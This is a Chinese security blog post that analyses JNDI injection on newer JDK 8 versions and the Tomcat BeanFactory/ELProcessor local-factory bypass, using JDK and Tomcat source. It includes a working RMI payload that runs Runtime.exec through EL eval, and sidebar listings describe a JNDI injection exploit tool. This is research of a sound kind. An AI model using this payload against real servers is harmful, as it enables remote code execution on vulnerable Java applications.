JNDI注入-高版本绕过

于 2024-07-30 16:57:31 发布
阅读量731 收藏 12
点赞数 27
分类专栏: JNDI注入 文章标签: JNDI JAVA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140801234
版权

参考博客:

JNDI注入与动态类加载

探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖 (tttang.com)

分析版本

jdk8u201

分析流程

修复

在ldap绕过中,我们讲了LDAP的修复,下面用jdk8u201具体来看下修复。

修复之前,利用是在LdapCtx.java中的return DirectoryManager.getObjectInstance(var3, var1, this, this.envprops, (Attributes)var4);动态加载Reference。

跟进看在codeBase路径中查找类处,

static ObjectFactory getObjectFactoryFromReference(
    Reference ref, String factoryName)
    throws IllegalAccessException,
    InstantiationException,
    MalformedURLException {
    Class<?> clas = null;

    // Try to use current class loader
    try {
         clas = helper.loadClass(factoryName);   //本地查找类
    } catch (ClassNotFoundException e) {
        // ignore and continue
        // e.printStackTrace();
    }
    // All other exceptions are passed up.

    // Not in class path; try to use codebase
    String codebase;
    if (clas == null &&
            (codebase = ref.getFactoryClassLocation()) != null) {
        try {
            clas = helper.loadClass(factoryName, codebase); //根据codeBase查找类
        } catch (ClassNotFoundException e) {
        }
    }

    return (clas != null) ? (ObjectFactory) clas.newInstance() : null;
}

跟进clas = helper.loadClass(factoryName, codebase);

public Class<?> loadClass(String className, String codebase)
        throws ClassNotFoundException, MalformedURLException {
    if ("true".equalsIgnoreCase(trustURLCodebase)) { //加入判断,trustURLCodebase为true,才加载类。这里默认false
        ClassLoader parent = getContextClassLoader();
        ClassLoader cl =
                URLClassLoader.newInstance(getUrlArray(codebase), parent);

        return loadClass(className, cl);
    } else {
        return null;
    }
}

本地factory绕过

这里面就不用区分JNDI结合RMI还是LDAP了,通用的。下面拿JNDI+RMI进行分析

分析攻击点

上面讲到了RMI,CORBA,LDAP漏洞被修复了,漏洞出现在客户端拿到Reference后,通过Reference加载codeBase路径下的factory处。、

修复方法就是默认不允许加载远程factory。但是Reference是可以正常获取的。

我们就想能不能找到本地的可以被恶意利用的factory类。

利用链寻找

看下JNDI+RMI中,拿到Reference之后做什么

//NamingManager#getObjectInstance
public static Object
    getObjectInstance(Object refInfo, Name name, Context nameCtx,
                      Hashtable<?,?> environment)
    throws Exception
{

    ObjectFactory factory;

    // Use builder if installed
    ObjectFactoryBuilder builder = getObjectFactoryBuilder();
    if (builder != null) {
        // builder must return non-null factory
        factory = builder.createObjectFactory(refInfo, environment);
        return factory.getObjectInstance(refInfo, name, nameCtx,
            environment);
    }

    // Use reference if possible
    Reference ref = null;
    if (refInfo instanceof Reference) {
        ref = (Reference) refInfo;
    } else if (refInfo instanceof Referenceable) {
        ref = ((Referenceable)(refInfo)).getReference();
    }

    Object answer;

    if (ref != null) {
        String f = ref.getFactoryClassName();
        if (f != null) {
            // if reference identifies a factory, use exclusively

            factory = getObjectFactoryFromReference(ref, f);                  本地动态加载factory
            if (factory != null) {
                return factory.getObjectInstance(ref, name, nameCtx,         factory调用getObjectInstance方法
                                                 environment);
            }
            // No factory found, so return original refInfo.
            // Will reach this point if factory class is not in
            // class path and reference does not contain a URL for it
            return refInfo;

        } else {
            // if reference has no factory, check for addresses
            // containing URLs

            answer = processURLAddrs(ref, name, nameCtx, environment);
            if (answer != null) {
                return answer;
            }
        }
    }

    // try using any specified factories
    answer =
        createObjectFromFactories(refInfo, name, nameCtx, environment);
    return (answer != null) ? answer : refInfo;
}

加载了本地factory后,调用其getObjectInstance方法。

我们要找的利用类需要满足

  1. 实现ObjectFactory,因为getObjectFactoryFromReference(ref, f);存在ObjectFactory的强转。
  2. 在调用其getObjectInstance时,可以触发危险方法

最后找到的是tomcat中的BeanFactory

//BeanFactory#getObjectInstance
public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                Hashtable<?,?> environment)
    throws NamingException {

    if (obj instanceof ResourceRef) {

        try {

            Reference ref = (Reference) obj;
            String beanClassName = ref.getClassName();
            Class<?> beanClass = null;
            ClassLoader tcl =
                Thread.currentThread().getContextClassLoader();
            if (tcl != null) {
                try {
                    beanClass = tcl.loadClass(beanClassName);
                } catch(ClassNotFoundException e) {
                }
            } else {
                try {
                    beanClass = Class.forName(beanClassName);
                } catch(ClassNotFoundException e) {
                    e.printStackTrace();
                }
            }
            if (beanClass == null) {
                throw new NamingException
                    ("Class not found: " + beanClassName);
            }

            BeanInfo bi = Introspector.getBeanInfo(beanClass);
            PropertyDescriptor[] pda = bi.getPropertyDescriptors();

            Object bean = beanClass.getConstructor().newInstance();    //获取构造函数,并实例化

            /* Look for properties with explicitly configured setter */
            RefAddr ra = ref.get("forceString");
            Map<String, Method> forced = new HashMap<>();
            String value;

            if (ra != null) {
                value = (String)ra.getContent();
                Class<?> paramTypes[] = new Class[1];
                paramTypes[0] = String.class;
                String setterName;
                int index;

                /* Items are given as comma separated list */
                for (String param: value.split(",")) {
                    param = param.trim();
                    /* A single item can either be of the form name=method
                     * or just a property name (and we will use a standard
                     * setter) */
                    index = param.indexOf('=');
                    if (index >= 0) {
                        setterName = param.substring(index + 1).trim();
                        param = param.substring(0, index).trim();
                    } else {
                        setterName = "set" +
                                     param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                                     param.substring(1);
                    }
                    try {
                        forced.put(param,
                                   beanClass.getMethod(setterName, paramTypes));
                    } catch (NoSuchMethodException|SecurityException ex) {
                        throw new NamingException
                            ("Forced String setter " + setterName +
                             " not found for property " + param);
                    }
                }
            }

            Enumeration<RefAddr> e = ref.getAll();

            while (e.hasMoreElements()) {

                ra = e.nextElement();
                String propName = ra.getType();

                if (propName.equals(Constants.FACTORY) ||
                    propName.equals("scope") || propName.equals("auth") ||
                    propName.equals("forceString") ||
                    propName.equals("singleton")) {
                    continue;
                }

                value = (String)ra.getContent();

                Object[] valueArray = new Object[1];

                /* Shortcut for properties with explicitly configured setter */
                Method method = forced.get(propName);
                if (method != null) {
                    valueArray[0] = value;
                    try {
                        method.invoke(bean, valueArray);                //反射调用bean的method方法
                    }

payload

测试前先把tomcat依赖加上(我开始用的8.5.90,tomcat把这儿就已经修复了)

<dependencies>
    <dependency>
        <groupId>org.apache.tomcat.embed</groupId>
        <artifactId>tomcat-embed-core</artifactId>
        <version>8.5.71</version> <!-- Latest version as of writing -->
    </dependency>
    <dependency>
        <groupId>org.glassfish</groupId>
        <artifactId>javax.el</artifactId>
        <version>3.0.0</version>
    </dependency>
</dependencies>

根据上面分析写出payload

public class JNDIRMIServerBypass {
    public static void main(String[] args) throws Exception {
        InitialContext initialContext = new InitialContext();
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);

        resourceRef.add(new StringRefAddr("forceString", "x=eval"));
        resourceRef.add(new StringRefAddr("x", "Runtime.getRuntime().exec('calc')"));

        initialContext.rebind("rmi://localhost:1099/remoteObj", resourceRef);
        BeanFactory
    }

image-20240730154148956

跟下攻击流程

下图是从拿到的Reference中获取factory(BeanFactory),之后调用BeanFactory的getObjectInstance方法。

image-20240730160802718

跟进BeanFactory#getObjectInstance

获取Reference的ClassName(javax.el.ELProcessor),并loadClass,得到ELProcessor类。

image-20240730161347584

调用ELProcessor的无参构造函数。

之后先把eval方法存到forced(hashMap)中,key为输入的x

image-20240730163056671

image-20240730162642405

之后获取propName为x,反射调用eval(通过x去forced中查找)

image-20240730162031667

这个方法需要Tomcat8环境的,现在java一般都是用Spring Boot框架开发,而Spring Boot内置了Tomcat,场景还是很多

其他利用方法

可以参考探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖 (tttang.com)的博客

y06_z
关注
  • 27
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
JNDI注入+版本绕过+工具使用
GalaxySpaceX的博客
06-21 2479
JNDI注入+版本绕过+工具使用
JDK版本JNDI注入绕过
wfz2333的博客
05-22 1149
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
JNDI注入-ldap绕过
07-30 150
传入var4参数,var4在下图中可以看到是在LDAP中查到的一些属性。下面if语句就是判断,拿到的是什么类型,选择相应的方法去decode。我jdk版本是8u141,可以看到这里也是做了trustURLCodebase的系统限制,不能远程加载类。注意这里又跳到DirectoryManager里面去了,和RMI一样攻击点是不在JNDI的文件中的。我弹计算器代码是写在静态代码块儿中的所以在初始化的时候就弹了计算器。这里面调用到了1中的两个方法,也是没有攻击点的。写在构造函数中的会在下面实例化的时候弹计算器。
JNDI注入利用原理及绕过版本JDK限制
mole_exp的博客
11-07 7346
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,... 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
jndi-1_2_1.zip_jndi_jndi-1.2.1.jar
09-23
标题中的"jndi-1_2_1.zip_jndi_jndi-1.2.1.jar"表明这是一个关于JNDI版本1.2.1的开源软件包,其中包含了一个名为"jndi-1.2.1.jar"的JAR文件。这个JAR文件包含了JNDI库的所有实现,使得开发者可以在他们的Java项目...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
开题报告电影票订票APP的设计与实现 已通过开题答辩的.doc
07-30
近些年的电影在人们文娱活动中占据重要地位,另外,由于人们的生活越来越富有,越来越多的人们不再选择在家里看电影,而是选择去电影院看电影。但是,以往的售票方式是需要工作人员一张张的录入到账户薄中的,这一模式已不再适应现在的实际情况,因为手动的操作不仅繁琐还容易存在差错。随着电子商务的发展,网络购票已经成为一种趋势,电子影票也已经慢慢走入人们的生活。目前,网票网作为国内首家全国性的网上选座购买电影票平台完全实现网上/手机查看影讯、自助选座、网银支付、自助验票全自助化营运模式。
Magene_C506_1722330141_905661_1722351868.fit
最新发布
07-30
Magene_C506_1722330141_905661_1722351868.fit
麻雀搜索算法SSA-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5631.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
开题报告 二手手机收售系统【答辩分内容】.doc
07-30
当换手机变成如“女人换衣服”般的容易,你被换下的那款二手手机究竟流向何处,才能释放其最大经济价值?某环保组织曾批露一组数据——每年,中国都会产生230万吨电子垃圾,仅次于美国的300万吨,是世界第二大电子垃圾生产国,并且还以年均20%的速度增加。另外据不完全统计,目前全国仅闲置手机就有10亿多部,并且每年新增3至5亿部。机遇与危机并存 据统计,我国手机用户数量现已达11.46亿。仅去年一年,全国就销售4.25亿部新手机,同时有近4亿部手机被淘汰。在这个手机更新换代比眨眼还快的年代,我国旧手机的回收和无害化处理措施却没能跟上,不少淘汰下来的旧手机都面临“无处可去”的尴尬。
KeePass密码管理器
07-30
KeePass是一个开源的密码管理器,它允许用户存储和管理他们的密码、证书、银行账户、信用卡信息等敏感数据。以下是一些关于KeePass的要点: 安全性:KeePass使用强大的加密算法来保护存储的数据,例如AES或Twofish。这意味着只有知道主密码或拥有主密钥文件的用户才能访问数据库。 跨平台:KeePass有多个版本,包括KeePass 2.x(适用于Windows)和KeePassXC(适用于Linux和macOS),它们都可以免费使用。 数据库:KeePass使用自己的数据库格式来存储密码,这使得用户可以创建复杂的数据库结构,包括分组、子分组和标签。 便携性:KeePass数据库可以存储在任何地方,包括U盘或云存储服务,使得用户可以随时随地访问他们的密码。 自动填充:KeePass可以集成到大多数现代浏览器中,自动填充登录表单,减少手动输入密码的需求。 密码生成器:KeePass内置了密码生成器,可以生成强大且难以猜测的密码。
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab
07-30
车牌识别matlab源程序本例演示了如何用matlab进行图像识别,适合对matlab和图像处理有一定基础的爱好者学习。br将文件放于matlab目录下work文件夹中运行_rezip1
前后端分离项目自动化一键部署
07-30
前后端分离项目自动化一键部署
开题报告 二手书平台管理系统的设计与实现【答辩分内容】.doc
07-30
伴着时代的进步,互联网的潮流越来越大,现在有很多平台都是卖二手书物品的,平台间的竞争也十分的激烈。但是在大学校园中确是没有那么难以发展的,如今通过观察,基本上没有哪个校有校内的二手书交易平台,所以这个发展空间还是很大的。许多有用的书籍被轻易的丢掉,这是一种浪费行为。 以往的二手书交易市场比如经常开办的跳蚤市场,其实很不便利。会受到诸多因素的限制,比如天气,如果天气条件恶劣,那么线下的交易市场就无法开展。如果恰好这时有同学有很紧急的需求,那么就会给学生带来不便。而且现在疫情期间是不允许群众聚集的,这也会带来不便。对于毕业生而言这种买卖的需求更加频繁,毕业离校有很多东西不方便携带,丢掉又感到可惜。那么建立一个二手书交易平台就是个很不错的选择。
多线程与多进程:Python并行编程的双刃剑
07-30
Python是一种广泛使用的级编程语言,由Guido van Rossum于1989年底发明,第一个公开发行版发行于1991年。Python的设计哲学强调代码的可读性和简洁的语法(尤其是使用空格缩进来区分代码块,而不是使用大括号或关键词)。这使得Python被认为是一种易于学习的语言,同时具备强大的功能,适合初学者和经验丰富的程序员。 Python的主要特点包括: 1. **易于学习**:Python有相对较少的关键字,结构简单,和一个明确定义的语法。 2. **易于阅读**:Python代码定义的清晰度使得它像可执行伪代码。 3. **易于维护**:Python的成功在于它的源代码是相当容易维护的。 4. **广泛的标准库**:Python的标凑库很庞大,包含用于互联网通信、网络通信、数据压缩、加密、系统管理等的模块。 5. **跨平台**:Python可以在多种操作系统上运行,包括但不限于Windows、Mac OS X、Linux等。 6. **解释型语言**:Python是一种解释型语言,这意味着开发过程中没有编译步骤。 7. **动态类型系统**:Python不会在编写
jndi-injection-exploit-1.0-snapshot-all.jar
03-16
jndi-injection-exploit-1.-snapshot-all.jar 是一个 Java 应用程序,用于测试和利用 JNDI 注入漏洞。JNDI 注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在目标系统上执行任意代码。该工具可以帮助安全研究人员和渗透测试人员测试和评估系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值